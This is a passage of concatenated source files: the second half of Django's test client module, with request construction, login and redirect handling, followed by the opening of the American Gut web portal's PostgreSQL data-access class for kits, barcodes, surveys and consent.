just as if that view had been hooked up using a URLconf.
"""
def __init__(self, **defaults):
self.defaults = defaults
self.cookies = SimpleCookie()
self.errors = BytesIO()
def _base_environ(self, **request):
"""
The base environment for a request.
"""
# This is a minimal valid WSGI environ dictionary, plus:
# - HTTP_COOKIE: for cookie support,
# - REMOTE_ADDR: often useful, see #8551.
# See http://www.python.org/dev/peps/pep-3333/#environ-variables
environ = {
'HTTP_COOKIE': self.cookies.output(header='', sep='; '),
'PATH_INFO': str('/'),
'REMOTE_ADDR': str('127.0.0.1'),
'REQUEST_METHOD': str('GET'),
'SCRIPT_NAME': str(''),
'SERVER_NAME': str('testserver'),
'SERVER_PORT': str('80'),
'SERVER_PROTOCOL': str('HTTP/1.1'),
'wsgi.version': (1, 0),
'wsgi.url_scheme': str('http'),
'wsgi.input': FakePayload(b''),
'wsgi.errors': self.errors,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
}
environ.update(self.defaults)
environ.update(request)
return environ
def request(self, **request):
"Construct a generic request object."
return WSGIRequest(self._base_environ(**request))
def _encode_data(self, data, content_type):
if content_type is MULTIPART_CONTENT:
return encode_multipart(BOUNDARY, data)
else:
# Encode the content so that the byte representation is correct.
match = CONTENT_TYPE_RE.match(content_type)
if match:
charset = match.group(1)
else:
charset = settings.DEFAULT_CHARSET
return force_bytes(data, encoding=charset)
def _get_path(self, parsed):
path = force_str(parsed[2])
# If there are parameters, add them
if parsed[3]:
path += str(";") + force_str(parsed[3])
path = uri_to_iri(path).encode(UTF_8)
# Under Python 3, non-ASCII values in the WSGI environ are arbitrarily
# decoded with ISO-8859-1. We replicate this behavior here.
# Refs comment in `get_bytes_from_wsgi()`.
return path.decode(ISO_8859_1) if six.PY3 else path
def get(self, path, data=None, secure=False, **extra):
"Construct a GET request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('GET', path, secure=secure, **r)
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
secure=False, **extra):
"Construct a POST request."
data = {} if data is None else data
post_data = self._encode_data(data, content_type)
return self.generic('POST', path, post_data, content_type,
secure=secure, **extra)
def head(self, path, data=None, secure=False, **extra):
"Construct a HEAD request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('HEAD', path, secure=secure, **r)
def trace(self, path, secure=False, **extra):
"Construct a TRACE request."
return self.generic('TRACE', path, secure=secure, **extra)
def options(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct an OPTIONS request."
return self.generic('OPTIONS', path, data, content_type,
secure=secure, **extra)
def put(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PUT request."
return self.generic('PUT', path, data, content_type,
secure=secure, **extra)
def patch(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PATCH request."
return self.generic('PATCH', path, data, content_type,
secure=secure, **extra)
def delete(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a DELETE request."
return self.generic('DELETE', path, data, content_type,
secure=secure, **extra)
def generic(self, method, path, data='',
content_type='application/octet-stream', secure=False,
**extra):
"""Constructs an arbitrary HTTP request."""
parsed = urlparse(force_str(path))
data = force_bytes(data, settings.DEFAULT_CHARSET)
r = {
'PATH_INFO': self._get_path(parsed),
'REQUEST_METHOD': str(method),
'SERVER_PORT': str('443') if secure else str('80'),
'wsgi.url_scheme': str('https') if secure else str('http'),
}
if data:
r.update({
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': str(content_type),
'wsgi.input': FakePayload(data),
})
r.update(extra)
# If QUERY_STRING is absent or empty, we want to extract it from the URL.
if not r.get('QUERY_STRING'):
query_string = force_bytes(parsed[4])
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
query_string = query_string.decode('iso-8859-1')
r['QUERY_STRING'] = query_string
return self.request(**r)
class Client(RequestFactory):
"""
A class that can act as a client for testing purposes.
It allows the user to compose GET and POST requests, and
obtain the response that the server gave to those requests.
The server Response objects are annotated with the details
of the contexts and templates that were rendered during the
process of serving the request.
Client objects are stateful - they will retain cookie (and
thus session) details for the lifetime of the Client instance.
This is not intended as a replacement for Twill/Selenium or
the like - it is here to allow testing against the
contexts and templates produced by a view, rather than the
HTML rendered to the end-user.
"""
def __init__(self, enforce_csrf_checks=False, **defaults):
super(Client, self).__init__(**defaults)
self.handler = ClientHandler(enforce_csrf_checks)
self.exc_info = None
def store_exc_info(self, **kwargs):
"""
Stores exceptions when they are generated by a view.
"""
self.exc_info = sys.exc_info()
def _session(self):
"""
Obtains the current session variables.
"""
engine = import_module(settings.SESSION_ENGINE)
cookie = self.cookies.get(settings.SESSION_COOKIE_NAME)
if cookie:
return engine.SessionStore(cookie.value)
session = engine.SessionStore()
session.save()
self.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
return session
session = property(_session)
def request(self, **request):
"""
The master request method. Composes the environment dictionary
and passes to the handler, returning the result of the handler.
Assumes defaults for the query environment, which can be overridden
using the arguments to the request.
"""
environ = self._base_environ(**request)
# Curry a data dictionary into an instance of the template renderer
# callback function.
data = {}
on_template_render = curry(store_rendered_templates, data)
signal_uid = "template-render-%s" % id(request)
signals.template_rendered.connect(on_template_render, dispatch_uid=signal_uid)
# Capture exceptions created by the handler.
exception_uid = "request-exception-%s" % id(request)
got_request_exception.connect(self.store_exc_info, dispatch_uid=exception_uid)
try:
try:
response = self.handler(environ)
except TemplateDoesNotExist as e:
# If the view raises an exception, Django will attempt to show
# the 500.html template. If that template is not available,
# we should ignore the error in favor of re-raising the
# underlying exception that caused the 500 error. Any other
# template found to be missing during view error handling
# should be reported as-is.
if e.args != ('500.html',):
raise
# Look for a signalled exception, clear the current context
# exception data, then re-raise the signalled exception.
# Also make sure that the signalled exception is cleared from
# the local cache!
if self.exc_info:
exc_info = self.exc_info
self.exc_info = None
six.reraise(*exc_info)
# Save the client and request that stimulated the response.
response.client = self
response.request = request
# Add any rendered template detail to the response.
response.templates = data.get("templates", [])
response.context = data.get("context")
response.json = curry(self._parse_json, response)
# Attach the ResolverMatch instance to the response
response.resolver_match = SimpleLazyObject(lambda: resolve(request['PATH_INFO']))
# Flatten a single context. Not really necessary anymore thanks to
# the __getattr__ flattening in ContextList, but has some edge-case
# backwards-compatibility implications.
if response.context and len(response.context) == 1:
response.context = response.context[0]
# Update persistent cookie data.
if response.cookies:
self.cookies.update(response.cookies)
return response
finally:
signals.template_rendered.disconnect(dispatch_uid=signal_uid)
got_request_exception.disconnect(dispatch_uid=exception_uid)
def get(self, path, data=None, follow=False, secure=False, **extra):
"""
Requests a response from the server using GET.
"""
response = super(Client, self).get(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
follow=False, secure=False, **extra):
"""
Requests a response from the server using POST.
"""
response = super(Client, self).post(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def head(self, path, data=None, follow=False, secure=False, **extra):
"""
Request a response from the server using HEAD.
"""
response = super(Client, self).head(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def options(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Request a response from the server using OPTIONS.
"""
response = super(Client, self).options(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def put(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PUT.
"""
response = super(Client, self).put(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def patch(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PATCH.
"""
response = super(Client, self).patch(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def delete(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a DELETE request to the server.
"""
response = super(Client, self).delete(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def trace(self, path, data='', follow=False, secure=False, **extra):
"""
Send a TRACE request to the server.
"""
response = super(Client, self).trace(path, data=data, secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def login(self, **credentials):
"""
Sets the Factory to appear as if it has successfully logged into a site.
Returns True if login is possible; False if the provided credentials
are incorrect.
"""
from django.contrib.auth import authenticate
user = authenticate(**credentials)
if user:
self._login(user)
return True
else:
return False
def force_login(self, user, backend=None):
self._login(user, backend)
def _login(self, user, backend=None):
from django.contrib.auth import login
engine = import_module(settings.SESSION_ENGINE)
# Create a fake request to store login details.
request = HttpRequest()
if self.session:
request.session = self.session
else:
request.session = engine.SessionStore()
login(request, user, backend)
# Save the session values.
request.session.save()
# Set the cookie to represent the session.
session_cookie = settings.SESSION_COOKIE_NAME
self.cookies[session_cookie] = request.session.session_key
cookie_data = {
'max-age': None,
'path': '/',
'domain': settings.SESSION_COOKIE_DOMAIN,
'secure': settings.SESSION_COOKIE_SECURE or None,
'expires': None,
}
self.cookies[session_cookie].update(cookie_data)
def logout(self):
"""
Removes the authenticated user's cookies and session object.
Causes the authenticated user to be logged out.
"""
from django.contrib.auth import get_user, logout
request = HttpRequest()
engine = import_module(settings.SESSION_ENGINE)
if self.session:
request.session = self.session
request.user = get_user(request)
else:
request.session = engine.SessionStore()
logout(request)
self.cookies = SimpleCookie()
def _parse_json(self, response, **extra):
if 'application/json' not in response.get('Content-Type'):
raise ValueError(
'Content-Type header is "{0}", not "application/json"'
.format(response.get('Content-Type'))
)
return json.loads(response.content.decode(), **extra)
def _handle_redirects(self, response, **extra):
"Follows any redirects by requesting responses from the server using GET."
response.redirect_chain = []
while response.status_code in (301, 302, 303, 307):
response_url = response.url
redirect_chain = response.redirect_chain
redirect_chain.append((response_url, response.status_code))
url = urlsplit(response_url)
if url.scheme:
extra['wsgi.url_scheme'] = url.scheme
if url.hostname:
extra['SERVER_NAME'] = url.hostname
if url.port:
extra['SERVER_PORT'] = str(url.port)
response = self.get(url.path, QueryDict(url.query), follow=False, **extra)
response.redirect_chain = redirect_chain
if redirect_chain[-1] in redirect_chain[:-1]:
# Check that we're not redirecting to somewhere we've already
# been to, to prevent loops.
raise RedirectCycleError("Redirect loop detected.", last_response=response)
if len(redirect_chain) > 20:
# Such a lengthy chain likely also means a loop, but one with
# a growing path, changing view, or changing query argument;
# 20 is the value of "network.http.redirection-limit" from Firefox.
raise RedirectCycleError("Too many redirects.", last_response=response)
return response
| filias/django | django/test/client.py | Python | bsd-3-clause | 27,179 |
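The `Client`/`RequestFactory` split above is the core of Django's test client: `Client` runs requests through the full handler and records templates, contexts and cookies, while `RequestFactory` only builds bare `WSGIRequest` objects. A brief usage sketch consistent with the docstrings and method signatures in this module; the URLs are placeholders.

```python
# Brief sketch of the two entry points defined above; URLs are placeholders.
from django.test import Client, RequestFactory

client = Client()                        # stateful: keeps cookies/session across calls
response = client.get('/hello/', follow=True)
chain = response.redirect_chain          # populated when follow=True
templates = response.templates           # rendered templates captured via signals

rf = RequestFactory()                    # builds bare WSGIRequest objects, no middleware
request = rf.post('/submit/', {'foo': 'bar'})
```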
from __future__ import division
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The American Gut Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
"""
Centralized database access for the American Gut web portal
"""
import logging
from uuid import UUID
import psycopg2
import bcrypt
import numpy as np
import pandas as pd
import random
import string
from amgut.lib.data_access.sql_connection import TRN
# character sets for kit id, passwords and verification codes
KIT_ALPHA = "abcdefghjkmnpqrstuvwxyz" # removed i, l and o for clarity
KIT_PASSWD = '1234567890'
KIT_VERCODE = KIT_PASSWD
KIT_PASSWD_NOZEROS = KIT_PASSWD[0:-1]
KIT_VERCODE_NOZEROS = KIT_PASSWD_NOZEROS
class AGDataAccess(object):
"""Data Access implementation for all the American Gut web portal
"""
# arbitrary, unique ID and value
human_sites = ['Stool',
'Mouth',
'Right hand',
'Left hand',
'Forehead',
'Torso',
'Left leg',
'Right leg',
'Nares',
'Hair',
'Tears',
'Nasal mucus',
'Ear wax',
'Vaginal mucus']
animal_sites = ['Stool',
'Mouth',
'Nares',
'Ears',
'Skin',
'Fur']
general_sites = ['Animal Habitat',
'Biofilm',
'Dust',
'Food',
'Fermented Food',
'Indoor Surface',
'Outdoor Surface',
'Plant habitat',
'Soil',
'Sole of shoe',
'Water']
#####################################
# Users
#####################################
def authenticateWebAppUser(self, username, password):
""" Attempts to validate authenticate the supplied username/password
Attempt to authenticate the user against the list of users in
web_app_user table. If successful, a dict with user innformation is
returned. If not, the function returns False.
"""
with TRN:
sql = """SELECT cast(ag_login_id as varchar(100)) as ag_login_id,
email, name, address, city,
state, zip, country,kit_password
FROM ag_login
INNER JOIN ag_kit USING (ag_login_id)
WHERE supplied_kit_id = %s"""
TRN.add(sql, [username])
row = TRN.execute_fetchindex()
if not row:
return False
results = dict(row[0])
password = password.encode('utf-8')
if not bcrypt.checkpw(password, results['kit_password']):
return False
results['ag_login_id'] = str(results['ag_login_id'])
return results
def check_login_exists(self, email):
"""Checks if email for login already exists on system
Parameters
----------
email : str
Email for user to check
Returns
-------
ag_login_id or None
If exists, returns ag_login_id, else returns None
"""
with TRN:
clean_email = email.strip().lower()
sql = "SELECT ag_login_id FROM ag_login WHERE LOWER(email) = %s"
TRN.add(sql, [clean_email])
value = TRN.execute_fetchindex()
if value:
value = value[0][0]
return None if value == [] else value
def addAGLogin(self, email, name, address, city, state, zip_, country):
"""Adds a new login or returns the login_id if email already exists
Parameters
----------
email : str
Email to register for user
name : str
Name to register for user
address : str
Street address to register for user
city : str
City to register for user
state : str
State to register for user
zip_ : str
Postal code to register for user
country : str
Country to register for user
Returns
-------
ag_login_id : str
UUID for new user, or existing user if email already in system
"""
with TRN:
clean_email = email.strip().lower()
ag_login_id = self.check_login_exists(email)
if not ag_login_id:
# create the login
sql = """INSERT INTO ag_login
(email, name, address, city, state, zip, country)
VALUES (%s, %s, %s, %s, %s, %s, %s)
RETURNING ag_login_id"""
TRN.add(sql, [clean_email, name, address, city, state, zip_,
country])
ag_login_id = TRN.execute_fetchlast()
return ag_login_id
def getAGBarcodeDetails(self, barcode):
"""Returns information about the barcode from both AG and standard info
Parameters
----------
barcode : str
Barcode to get information for
Returns
-------
dict
All barcode info, keyed to column name
Raises
------
ValueError
Barcode not found in AG information tables
"""
sql = """SELECT email,
cast(ag_kit_barcode_id as varchar(100)),
cast(ag_kit_id as varchar(100)),
barcode,
site_sampled,
environment_sampled,
sample_date,
sample_time,
participant_name,
notes,
refunded,
withdrawn,
moldy,
other,
other_text,
date_of_last_email,
overloaded,
name,
status
FROM ag.ag_kit_barcodes
LEFT JOIN barcodes.barcode USING (barcode)
LEFT JOIN ag.ag_kit USING (ag_kit_id)
LEFT JOIN ag.ag_login_surveys USING (ag_login_id)
LEFT JOIN ag.ag_login USING (ag_login_id)
WHERE barcode = %s"""
with TRN:
TRN.add(sql, [barcode])
row = TRN.execute_fetchindex()
if not row:
raise ValueError('Barcode does not exist in AG: %s' % barcode)
return dict(row[0])
def getAGSurveyDetails(self, survey_id, language):
"""Returns survey information of a specific survey_id and language
Parameters
----------
survey_id : str
the id of the survey group
language : str
the language the survey is intended for
Returns
-------
DataFrame
pandas DataFrame of sorted survey details
Raises
------
ValueError
survey_id not found in database
ValueError
language not found in database
"""
if survey_id not in self.getKnownSurveyIds():
raise ValueError('Invalid survey_id')
if language not in self.getKnownLanguages():
raise ValueError('Invalid language')
sql = """SELECT survey_question_id,
survey_group,
%s,
question_shortname,
response,
ag.survey_question_response.display_index
AS response_index
FROM ag.survey_question
LEFT JOIN ag.survey_question_response
USING (survey_question_id)
LEFT JOIN ag.group_questions USING (survey_question_id)
LEFT JOIN ag.surveys USING (survey_group)
WHERE survey_id = %s""" % (language, survey_id)
with TRN:
TRN.add(sql)
survey_details = TRN.execute_fetchindex()
df = pd.DataFrame([dict(r) for r in survey_details],
columns=['survey_question_id',
'survey_group',
language,
'question_shortname',
'response',
'response_index'])
# sorts so that questions emulate survey order
df = df.sort_values(by=['survey_group',
'survey_question_id',
'response_index']).drop(columns='survey_group')
# converts response_index from float to int
df['response_index'] = df['response_index'].apply(
lambda x: None if np.isnan(x) else int(x), convert_dtype=False)
return df
def getKnownSurveyIds(self):
"""Returns all known survey IDs of each survey type
Returns
-------
list of ints
List of survey_ids in ascending order
Raises
------
ValueError
Survey IDs were not able to be found
"""
sql = """SELECT survey_id FROM ag.surveys"""
with TRN:
TRN.add(sql)
survey_ids = TRN.execute_fetchindex()
if not survey_ids:
raise ValueError('Survey IDs were not able to be found')
# survey_ids must be converted from list of DictRow to a set
survey_ids = [x[0] for x in survey_ids]
unique_survey_ids = set([])
for i in survey_ids:
unique_survey_ids.add(i)
return unique_survey_ids
def getKnownLanguages(self):
"""Returns all known language locales
Returns
-------
list of strings
List of language locales used for surveys
Raises
------
ValueError
Languages were not able to be found
"""
sql = """SELECT column_name FROM information_schema.columns
WHERE table_name = 'survey_response'"""
with TRN:
TRN.add(sql)
languages = TRN.execute_fetchindex()
if not languages:
raise ValueError('Languages were not able to be found')
languages = [x[0] for x in languages]
languages_set = set([])
for i in languages:
languages_set.add(i)
return languages_set
def getAGKitDetails(self, supplied_kit_id):
sql = """SELECT cast(ag_kit_id as varchar(100)),
supplied_kit_id, kit_password, swabs_per_kit, kit_verified,
kit_verification_code, verification_email_sent
FROM ag_kit
WHERE supplied_kit_id = %s"""
with TRN:
TRN.add(sql, [supplied_kit_id])
row = TRN.execute_fetchindex()
if not row:
raise ValueError('Supplied kit id does not exist in AG: %s' %
supplied_kit_id)
return dict(row[0])
def registerHandoutKit(self, ag_login_id, supplied_kit_id):
"""Registeres a handout kit to a user
Parameters
----------
ag_login_id : str
UUID4 formatted string of login ID to associate with kit
supplied_kit_id : str
kit ID for the handout kit
Returns
-------
bool
True: success
False: insert failed due to IntegrityError
Raises
------
ValueError
Non-UUID4 value sent as ag_login_id
"""
with TRN:
# make sure properly formatted UUID passed in
UUID(ag_login_id, version=4)
printresults = self.checkPrintResults(supplied_kit_id)
# make sure login_id and skid exists
sql = """SELECT EXISTS(SELECT *
FROM ag.ag_login
WHERE ag_login_id = %s)"""
TRN.add(sql, [ag_login_id])
exists = TRN.execute_fetchlast()
if not exists:
return False
sql = """SELECT EXISTS(SELECT *
FROM ag.ag_handout_kits
WHERE kit_id = %s)"""
TRN.add(sql, [supplied_kit_id])
if not TRN.execute_fetchlast():
return False
sql = """
DO $do$
DECLARE
k_id uuid;
bc varchar;
BEGIN
INSERT INTO ag_kit
(ag_login_id, supplied_kit_id, kit_password, swabs_per_kit,
kit_verification_code, print_results)
SELECT '{0}', kit_id, password, swabs_per_kit,
verification_code, '{1}'
FROM ag_handout_kits WHERE kit_id = %s LIMIT 1
RETURNING ag_kit_id INTO k_id;
FOR bc IN
SELECT barcode
FROM ag_handout_barcodes
WHERE kit_id = %s
LOOP
INSERT INTO ag_kit_barcodes
(ag_kit_id, barcode, sample_barcode_file)
VALUES (k_id, bc, bc || '.jpg');
END LOOP;
DELETE FROM ag_handout_barcodes WHERE kit_id = %s;
DELETE FROM ag_handout_kits WHERE kit_id = %s;
END $do$;
""".format(ag_login_id, printresults)
TRN.add(sql, [supplied_kit_id] * 4)
try:
TRN.execute()
except psycopg2.IntegrityError:
logging.exception('Error on skid %s:' % ag_login_id)
return False
return True
def get_all_handout_kits(self):
with TRN:
sql = 'SELECT kit_id FROM ag.ag_handout_kits'
TRN.add(sql)
return TRN.execute_fetchflatten()
def deleteAGParticipantSurvey(self, ag_login_id, participant_name):
# Remove user from new schema
with TRN:
sql = """SELECT survey_id, participant_email
FROM ag_login_surveys
JOIN ag_consent USING (ag_login_id, participant_name)
WHERE ag_login_id = %s AND participant_name = %s"""
TRN.add(sql, (ag_login_id, participant_name))
# collect all survey_ids and participant_names, since at least the
# former might be more than one.
survey_ids = set()
participant_emails = set()
for hit in TRN.execute_fetchindex():
survey_ids.add(hit[0])
participant_emails.add(hit[1])
sql = """SELECT barcode
FROM ag.source_barcodes_surveys
WHERE survey_id IN %s"""
TRN.add(sql, [tuple(survey_ids)])
barcodes = [x[0] for x in TRN.execute_fetchindex()]
sql = "DELETE FROM survey_answers WHERE survey_id IN %s"
TRN.add(sql, [tuple(survey_ids)])
sql = "DELETE FROM survey_answers_other WHERE survey_id IN %s"
TRN.add(sql, [tuple(survey_ids)])
# Reset survey attached to barcode(s)
for info in self.getParticipantSamples(ag_login_id,
participant_name):
self.deleteSample(info['barcode'], ag_login_id)
# Delete last due to foreign keys
sql = """DELETE FROM ag.source_barcodes_surveys
WHERE survey_id IN %s"""
TRN.add(sql, [tuple(survey_ids)])
if len(barcodes) != 0:
# only delete barcode information, if this is the
# last survey for the given source, i.e. ag_login_id,
# participant_name combination
if len(survey_ids) == 1:
sql = """DELETE FROM ag.ag_kit_barcodes
WHERE barcode IN %s"""
TRN.add(sql, [tuple(barcodes)])
sql = "DELETE FROM ag_login_surveys WHERE survey_id IN %s"
TRN.add(sql, [tuple(survey_ids)])
sql = """DELETE FROM ag_consent
WHERE ag_login_id = %s AND participant_name = %s"""
TRN.add(sql, [ag_login_id, participant_name])
# checks if the user has previously been
# removed and still has revoked consent
sql = """SELECT ag_login_id FROM ag.consent_revoked"""
TRN.add(sql)
revoked = {result[0] for result in TRN.execute_fetchindex()}
# only inserts to ag.consent_revoked if not already there
if ag_login_id not in revoked:
sql = """INSERT INTO ag.consent_revoked
(ag_login_id, participant_name, participant_email)
VALUES (%s, %s, %s)"""
sql_args = [[ag_login_id, participant_name, pemail]
for pemail in participant_emails]
TRN.add(sql, sql_args, many=True)
TRN.execute()
def get_withdrawn(self):
"""Gets the list of withdrawn participants and information
Returns
-------
list of tuple of strings
List of withdrawn participants, in the form
(ag_login_id, participant_name, participant_email, date_revoked)
"""
with TRN:
sql = "SELECT * FROM consent_revoked"
TRN.add(sql)
return TRN.execute_fetchindex()
def getConsent(self, survey_id):
with TRN:
TRN.add("""SELECT agc.participant_name,
agc.participant_email,
agc.parent_1_name,
agc.parent_2_name,
agc.is_juvenile,
agc.deceased_parent,
agc.ag_login_id,
agc.date_signed,
agc.assent_obtainer,
agc.age_range,
agl.survey_id
FROM ag_consent agc
JOIN ag_login_surveys agl
USING (ag_login_id, participant_name)
WHERE agl.survey_id = %s""", [survey_id])
result = TRN.execute_fetchindex()
if not result:
raise ValueError("Survey ID does not exist in DB: %s" %
survey_id)
return dict(result[0])
def logParticipantSample(self, ag_login_id, barcode, sample_site,
environment_sampled, sample_date, sample_time,
participant_name, notes):
with TRN:
if sample_site is not None:
# Get non timepoint specific survey IDs.
# As of this comment, a non timepoint specific survey is
# implicit, and currently limited to vioscreen FFQs
# We do not want to associate timepoint specific surveys
# with the wrong barcode
sql = """SELECT survey_id, vioscreen_status
FROM ag_login_surveys
WHERE ag_login_id = %s
AND participant_name = %s"""
TRN.add(sql, (ag_login_id, participant_name))
results = TRN.execute_fetchindex()
survey_ids = [x[0] for x in results]
statuses = [x[1] for x in results]
# if we have more than 1 ID, filter out those associated to
# vioscreen
if len(survey_ids) > 1:
keep = []
for sid, vs in zip(survey_ids, statuses):
if vs is None:
keep.append(sid)
survey_ids = keep
# if we only have a single survey ID then advance regardless
# of vioscreen status
if len(survey_ids) == 1:
pass
if len(survey_ids) == 0:
# if we don't have a definite non-vioscreen survey ID
# which can arise on legacy accounts, then we'll create a
# new ID without a vioscreen_status entry. Note that
# the associate_barcode_to_survey_id call is necessary to
# add the survey ID into ag_login_surveys and it also takes
# care of the survey_id <-> barcode association
new_survey_id = self.get_new_survey_id()
self.associate_barcode_to_survey_id(ag_login_id,
participant_name,
barcode, new_survey_id)
else:
# otherwise, it is an environmental sample
survey_ids = []
# Add barcode info
sql = """UPDATE ag_kit_barcodes
SET site_sampled = %s, environment_sampled = %s,
sample_date = %s, sample_time = %s,
notes = %s
WHERE barcode = %s"""
TRN.add(sql, [sample_site, environment_sampled, sample_date,
sample_time, notes,
barcode])
if len(survey_ids) > 0:
sql = """INSERT INTO ag.source_barcodes_surveys (survey_id,
barcode)
VALUES (%s, %s)"""
for survey_id in survey_ids:
TRN.add(sql, [survey_id, barcode])
def deleteSample(self, barcode, ag_login_id):
""" Removes by either releasing barcode back for relogging or withdraw
Parameters
----------
barcode : str
Barcode to delete
ag_login_id : UUID4
Login ID for the barcode
Notes
-----
        Strictly speaking the ag_login_id isn't needed, but it makes the
        function much harder to abuse: an attacker would need to know someone
        else's login id (a GUID) to delete something maliciously.
        If the barcode has never been scanned, assume a mis-log and wipe it so
        the barcode can be logged again. If the barcode has been scanned, that
        means we have received it and must withdraw it to delete it from the
        system.
"""
with TRN:
# Figure out if we've received the barcode or not
sql = "SELECT scan_date FROM barcode WHERE barcode = %s"
TRN.add(sql, [barcode])
received = TRN.execute_fetchlast()
if not received:
                # Not received, so we release the barcode back to be relogged
set_text = """site_sampled = NULL,
sample_time = NULL, sample_date = NULL,
environment_sampled = NULL, notes = NULL"""
sql = "UPDATE barcode SET status = NULL WHERE barcode = %s"
TRN.add(sql, [barcode])
else:
                # barcode already received, so we withdraw the barcode
set_text = "withdrawn = 'Y'"
sql = """UPDATE ag_kit_barcodes
SET {}
WHERE barcode IN (
SELECT akb.barcode
FROM ag_kit_barcodes akb
INNER JOIN ag_kit ak USING (ag_kit_id)
WHERE ak.ag_login_id = %s
AND akb.barcode = %s)""".format(set_text)
TRN.add(sql, [ag_login_id, barcode])
sql = """DELETE FROM ag.source_barcodes_surveys
WHERE barcode = %s"""
TRN.add(sql, [barcode])
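    # A minimal usage sketch of the release-vs-withdraw logic above (hypothetical
    # values; assumes this data-access class has been instantiated as `ag_data`
    # with a working TRN connection):
    #
    #   # never-scanned barcode: cleared so it can be logged again
    #   ag_data.deleteSample('000001053', 'd8592c74-9694-2135-e040-8a80115d6401')
    #   # already-scanned barcode: marked withdrawn instead of cleared
    #   ag_data.deleteSample('000032951', 'd8592c74-9694-2135-e040-8a80115d6401')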
def getHumanParticipants(self, ag_login_id):
# get people from new survey setup
sql = """SELECT DISTINCT participant_name from ag.ag_login_surveys
LEFT JOIN ag.survey_answers USING (survey_id)
JOIN ag.group_questions gq USING (survey_question_id)
JOIN ag.surveys ags USING (survey_group)
WHERE ag_login_id = %s AND ags.survey_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id, 1])
return TRN.execute_fetchflatten()
def associate_barcode_to_survey_id(self, ag_login_id, participant_name,
barcode, survey_id):
"""Associate a barcode to a survey ID
Parameters
----------
ag_login_id : str
A valid AG login ID
participant_name : str
The name of a participant associated with the login
barcode : str
A valid barcode associated with the login
survey_id : str
A valid survey ID
"""
with TRN:
# test first if the barcode is already associated to a participant
sql = """SELECT ag_login_id, participant_name, barcode
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING(survey_id)
WHERE ag_login_id=%s
AND participant_name=%s
AND barcode=%s"""
TRN.add(sql, [ag_login_id, participant_name, barcode])
results = TRN.execute_fetchflatten()
if len(results) == 0:
# this implies the barcode was unassigned, and this is a new
# assignment.
# Let's verify the barcode is associated to the kit and login
sql = """SELECT 1
FROM ag.ag_login
JOIN ag.ag_kit USING (ag_login_id)
JOIN ag.ag_kit_barcodes USING (ag_kit_id)
WHERE ag_login_id=%s
AND barcode=%s"""
TRN.add(sql, [ag_login_id, barcode])
results = TRN.execute_fetchflatten()
if len(results) == 0:
# the barcode is not part of a kit with the login ID
raise ValueError("Unexpected barcode / kit relationship")
# the barcode should also not already be linked to a
# participant within the kit
sql = """SELECT 1
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING(survey_id)
WHERE ag_login_id=%s
AND barcode=%s"""
TRN.add(sql, [ag_login_id, barcode])
results = TRN.execute_fetchflatten()
if len(results) > 0:
# the barcode is already assigned to someone on the kit
raise ValueError("Barcode already assigned")
sql = """INSERT INTO ag_login_surveys
(ag_login_id, survey_id, participant_name)
VALUES (%s, %s, %s)"""
TRN.add(sql, [ag_login_id, survey_id, participant_name])
sql = """INSERT INTO ag.source_barcodes_surveys
(survey_id, barcode)
VALUES (%s, %s)"""
TRN.add(sql, [survey_id, barcode])
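    # Sketch of the checks enforced above (hypothetical values; assumes an
    # instance `ag_data` of this class):
    #
    #   ag_data.associate_barcode_to_survey_id(login_id, 'Jane', '000004217', sid)
    #   # raises ValueError("Unexpected barcode / kit relationship") if the barcode
    #   # does not belong to a kit of login_id, raises
    #   # ValueError("Barcode already assigned") if someone on the kit already has
    #   # it, and otherwise inserts the ag_login_surveys and
    #   # ag.source_barcodes_surveys rows.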
def updateVioscreenStatus(self, survey_id, status):
with TRN:
sql = """UPDATE ag_login_surveys
SET vioscreen_status = %s
WHERE survey_id = %s"""
TRN.add(sql, (status, survey_id))
def get_vioscreen_status(self, survey_id):
"""Retrieves the vioscreen status for a survey_id
Parameters
----------
survey_id : str
The survey to get status for
Returns
-------
int
Vioscreen status
Raises
------
ValueError
survey_id passed is not in the database
"""
with TRN:
sql = """SELECT vioscreen_status
FROM ag.ag_login_surveys
WHERE survey_id = %s"""
TRN.add(sql, [survey_id])
status = TRN.execute_fetchindex()
if not status:
raise ValueError("Survey ID %s not in database" % survey_id)
return status[0][0]
def getAnimalParticipants(self, ag_login_id):
sql = """SELECT DISTINCT participant_name from ag.ag_login_surveys
JOIN ag.survey_answers USING (survey_id)
JOIN ag.group_questions gq USING (survey_question_id)
JOIN ag.surveys ags USING (survey_group)
